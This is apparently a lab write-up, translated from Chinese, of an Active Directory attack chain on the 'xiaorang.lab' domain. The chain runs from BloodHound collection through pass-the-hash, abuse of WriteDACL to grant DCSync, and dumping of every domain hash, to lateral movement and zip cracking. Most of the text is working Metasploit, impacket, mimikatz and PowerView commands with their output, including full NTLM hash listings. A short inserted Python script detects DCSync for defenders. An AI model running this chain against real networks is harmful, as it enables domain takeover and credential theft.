set SMBPass 00000000000000000000000000000000:766a276a053f370d92eaf25c243f1124
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54525
run

bloodhound

Next, use the SYSTEM privileges to collect information with BloodHound.

Start BloodHound:

sudo neo4j start

./BloodHound --no-sandbox

Sharphound

We can log on to XIAORANG-EXC01 and run SharpHound to collect data for permission analysis.

SharpHound.exe -c all

bloodhound-python

Collecting with bloodhound-python is more convenient

# install bloodhound-python: pipx install bloodhound
proxychains4 bloodhound-python -u "XIAORANG-EXC01$" --hashes :766a276a053f370d92eaf25c243f1124 -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip

RDP

# Not sure why, but RDP does not work here
proxychains xfreerdp3 /u:XIAORANG-EXC01$ /pth:766a276a053f370d92eaf25c243f1124 /v:172.22.3.9 /d:xiaorang.lab /cert:ignore
proxychains xfreerdp3 /u:administrator /pth:7acbc09a6c0efd81bfa7d5a1d4238beb /v:172.22.3.9 /d:xiaorang.lab /cert:ignore

# Probably Restricted Admin Mode is not enabled; it must be enabled on the target machine (or through group policy)
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

WriteDacl

Analysis also shows that the EXC01 machine account has WriteDACL over other members of the domain by default.

WriteDACL allows us to modify the access control list (ACL) of the specified object; in other words, we can grant rights to other accounts. For example, we can grant the DCSync right to the user Zhangtong, after which Zhangtong can be used to pull password hashes from the domain controller.

DCSync is a common domain-penetration technique that is built into Mimikatz. Before DCSync existed, obtaining domain users' hashes required logging on to a domain controller and executing code there. DCSync was added to mimikatz in 2015, written by Benjamin Delpy (gentilkiwi) and Vincent Le Toux, and can export the hashes of every user in the domain.

So once we find that the EXC01 machine account has WriteDACL, we can use it to change other users' permissions and grant Zhangtong the DCSync right, after which Zhangtong can pull the domain controller's hashes remotely.

In short:

EXC01 can modify domain users' permissions → grant Zhangtong the DCSync right → use Zhangtong to export the domain controller's hashes.
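The defensive counterpart of this chain is watching for replication requests that do not come from a domain controller. The following Python script is an added example, not code from the original post or from any of the tools it uses: it evaluates Windows Security event 4662 records for the DS-Replication control-access right GUIDs (these three GUIDs are the real Active Directory extended-right identifiers) and raises an alert for any subject that is not on the allow-list of DC computer accounts. The events and the allow-list are constructed here; the account names are the ones from this lab.

```python
import re

# Extended-right GUIDs that a DCSync (mimikatz lsadump::dcsync, secretsdump -just-dc) needs on the
# domain object. These are the real Active Directory control-access right GUIDs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed allow-list: computer accounts of the real domain controllers. Replication between
# DCs is normal; anything else asking for these rights is the alert.
KNOWN_DCS = {"XIAORANG-WIN16$"}


def replication_rights_in(properties):
    """Map the GUIDs in a 4662 'Properties' field to the replication rights they stand for."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def evaluate_4662(event, known_dcs=KNOWN_DCS):
    """Return an alert dict for a DCSync-like event, or None."""
    if event.get("EventID") != 4662:
        return None
    rights = replication_rights_in(event.get("Properties", ""))
    if not rights:
        return None
    subject = event["SubjectUserName"]
    if subject in known_dcs:
        return None
    # Get-Changes-All is the right that actually returns secrets; Get-Changes alone is still
    # worth a look because it is one ACL edit away from the full set.
    severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
    return {
        "subject": f"{event.get('SubjectDomainName', '')}\\{subject}",
        "rights": rights,
        "object": event.get("ObjectName", ""),
        "severity": severity,
    }


def alerts_for(events, known_dcs=KNOWN_DCS):
    """Evaluate a batch of events and keep only the alerts."""
    return [a for a in (evaluate_4662(e, known_dcs) for e in events) if a]


# Constructed sample events (only the 4662 fields the rule needs); names are from this lab.
DOMAIN_DN = "DC=xiaorang,DC=lab"
BOTH = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "XIAORANG-WIN16$", "SubjectDomainName": "XIAORANG",
     "ObjectName": DOMAIN_DN, "Properties": BOTH},                       # DC-to-DC, expected
    {"EventID": 4662, "SubjectUserName": "Zhangtong", "SubjectDomainName": "XIAORANG",
     "ObjectName": DOMAIN_DN, "Properties": BOTH},                       # user pulling secrets
    {"EventID": 4662, "SubjectUserName": "Zhangtong", "SubjectDomainName": "XIAORANG",
     "ObjectName": DOMAIN_DN,
     "Properties": "{00000000-0000-0000-0000-000000000001}"},            # constructed, non-replication GUID
    {"EventID": 4662, "SubjectUserName": "XIAORANG-EXC01$", "SubjectDomainName": "XIAORANG",
     "ObjectName": DOMAIN_DN,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},            # Get-Changes only
    {"EventID": 4624, "SubjectUserName": "Zhangtong", "SubjectDomainName": "XIAORANG"},  # not a 4662
]

if __name__ == "__main__":
    for alert in alerts_for(SAMPLE_EVENTS):
        print(alert)
```

Event 4662 only records these accesses when a SACL for them exists on the domain object and "Audit Directory Service Access" is enabled, so check that first. The same GUIDs are also the thing to search for preventively in the domain object's DACL: any principal that holds them and is not a domain controller (in this lab, an Exchange server account or an ordinary user) is a standing DCSync path, and a WriteDACL holder on the domain object can create one at will.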

PowerView

PowerView is part of the PowerSploit toolkit.

We can grant the DCSync (or GenericAll) right, after which the domain controller's hashes can be dumped

Import-Module .\PowerView.ps1;
Add-DomainObjectAcl -TargetIdentity "DC=xiaorang,DC=lab" -PrincipalIdentity XIAORANG-EXC01$ -Rights DCSync

If you have a meterpreter session, it seems you can also do this directly:

load powershell
powershell_import /root/Desktop/PowerView.ps1 # replace with your own path
powershell_execute "Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity 'XIAORANG-EXC01$' -Rights DCSync"

I didn't try PowerView, though; I used the tool below directly

impacket-dacledit

Grant the DCSync right with the impacket toolkit

# fails: the newly created user is not in the domain
proxychains impacket-dacledit xiaorang.lab/XIAORANG-EXC01\$ -hashes :766a276a053f370d92eaf25c243f1124 -action write -rights DCSync -principal matrix -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

# succeeds
proxychains impacket-dacledit xiaorang.lab/XIAORANG-EXC01\$ -hashes :766a276a053f370d92eaf25c243f1124 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
proxychains impacket-dacledit xiaorang.lab/XIAORANG-EXC01\$ -hashes :766a276a053f370d92eaf25c243f1124 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

Now we can use DCSync to dump the domain admin's hash

# run through impacket-psexec
.\mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

# or msf
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

meterpreter > kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt b8fa79a52e918cb0cbcd1c0ede492647 514
1137 HealthMailboxeda7a84 1e89e23e265bb7b54dc87938b1b1a131 66048
1138 HealthMailbox33b01cf 0eff3de35019c2ee10b68f48941ac50d 66048
1139 HealthMailbox9570292 e434c7db0f0a09de83f3d7df25ec2d2f 66048
1140 HealthMailbox3479a75 c43965ecaa92be22c918e2604e7fbea0 66048
1141 HealthMailbox2d45c5b 4822b67394d6d93980f8e681c452be21 66048
1142 HealthMailboxec2d542 147734fa059848c67553dc663782e899 66048
1143 HealthMailboxf5f7dbd e7e4f69b43b92fb37d8e9b20848e6b66 66048
1144 HealthMailbox67dc103 4fe68d094e3e797cfc4097e5cca772eb 66048
1145 HealthMailbox320fc73 0c3d5e9fa0b8e7a830fcf5acaebe2102 66048
1146 Lumia 862976f8b23c13529c2fb1428e710296 512
500 Administrator 7acbc09a6c0efd81bfa7d5a1d4238beb 512
1000 XIAORANG-WIN16$ f4e293923315dbf505c2e33aefc92cca 532480
1147 Zhangtong 22c7f81993e96ac83ac2f3f1903de8b4 512
1103 XIAORANG-EXC01$ 766a276a053f370d92eaf25c243f1124 4096
1104 XIAORANG-PC$ 57945839978ad251d75c5a8f4196472a 4096
1135 HealthMailbox8446c5b 42f51f9c4b7e0cd90f4c34fea8a202d8 66048
1136 HealthMailbox0d5918e 36f432a5d2b2754167986ee5973d003f 66048

mimikatz(powershell) # exit
Bye!

# or
proxychains4 impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
proxychains4 impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.2:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.2:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.3.2:49667 ... OK
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:42f51f9c4b7e0cd90f4c34fea8a202d8:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:36f432a5d2b2754167986ee5973d003f:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:f4e293923315dbf505c2e33aefc92cca:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:766a276a053f370d92eaf25c243f1124:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:57945839978ad251d75c5a8f4196472a:::
[*] Cleaning up...

With the domain admin's hash in hand we can move laterally wherever we like

proxychains impacket-psexec administrator@172.22.3.2 -hashes ':7acbc09a6c0efd81bfa7d5a1d4238beb' -codec gbk
# or
use exploit/windows/smb/psexec
set RHOSTS 172.22.3.2
set SMBUser administrator
set SMBPass 00000000000000000000000000000000:7acbc09a6c0efd81bfa7d5a1d4238beb
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54526
run

# get the flag
type c:\Users\Administrator\flag\flag.txt
____ ___.___ _____ ________ __________ _____ _______ ________
\ \/ /| | / _ \ \_____ \\______ \ / _ \ \ \ / _____/
\ / | |/ /_\ \ / | \| _/ / /_\ \ / | \/ \ ___
/ \ | / | \/ | \ | \/ | \/ | \ \_\ \
/___/\ \|___\____|__ /\_______ /____|_ /\____|__ /\____|__ /\______ /
\_/ \/ \/ \/ \/ \/ \/

flag04: flag{6aecb4b9-02a1-45be-bdfd-e1d7db8d6de8}

flag3

One flag remains; it should be on the .26 host.

Next, move laterally to .26 for flag3

proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -dc-ip 172.22.3.2

use C$
cd /users/lumia/desktop

Pass-the-hash with psexec failed; smbexec works

# does not work
proxychains4 impacket-psexec xiaorang.lab/administrator@172.22.3.26 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2 -debug
# -codec gbk, -codec default and -debug do not help either
# also does not work
use exploit/windows/smb/smbexec
set RHOSTS 172.22.3.26
set SMBUser administrator
set SMBPass 00000000000000000000000000000000:7acbc09a6c0efd81bfa7d5a1d4238beb
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54528
run

# this works
proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk

Although both impacket-psexec and impacket-smbexec can log on to Windows with a hash, they work differently:

  • psexec creates a service on the target host (it needs write access to the ADMIN$ share, and the target's policy must allow it); some environments (security policy, antivirus, port policy) block new service creation or writes to ADMIN$.
  • smbexec runs commands remotely without creating a new service on the target, so it has lower permission and policy requirements and better compatibility.

In C:\users\lumia\desktop we find secret.zip and download it with get.

secret.zip contains flag.docx, but the archive is password-protected.

Dumping the mailbox

Here we use Lumia's hash, obtained in the second dump, to download the mail from Outlook

# dump the mail with this tool
git clone https://github.com/Jumbo-WJB/PTH_Exchange.git

proxychains4 python3 pthexchange.py --target https://172.22.3.9 --username Lumia --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download

We get two e-mails (they can be opened with NetEase Mail, 网易邮箱):

The first has the same secret.zip attached, and the message hints that it is encrypted with a phone number;

The second has a list of names and phone numbers attached.

Dictionary attack

We use the phone numbers as the wordlist

cat item-1-phone\ lists.csv | grep -Po ',\d+' | sed 's/,//' > num.txt
zip2john item-0-secret.zip >aaa
john aaa --wordlist=num.txt


# output:
┌──(matrix㉿matrix)-[~/Desktop/PTH_Exchange/output]
└─$ cat item-1-phone\ lists.csv | grep -Po ',\d+' | sed 's/,//' > num.txt
┌──(matrix㉿matrix)-[~/Desktop/PTH_Exchange/output]
└─$ zip2john item-0-secret.zip >aaa
ver 2.0 item-0-secret.zip/flag.docx PKZIP Encr: cmplen=668284, decmplen=671056, crc=AFEF0968 ts=AB91 cs=afef type=8
┌──(matrix㉿matrix)-[~/Desktop/PTH_Exchange/output]
└─$ john aaa --wordlist=num.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
18763918468 (item-0-secret.zip/flag.docx)
1g 0:00:00:00 DONE (2025-08-16 00:13) 100.0g/s 50000p/s 50000c/s 50000C/s 15265180637..15989600577
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The cracked password is 18763918468; extract the archive and read the flag.


http://example.com/2026/test51/
Author: sangnigege
Published: 15 April 2026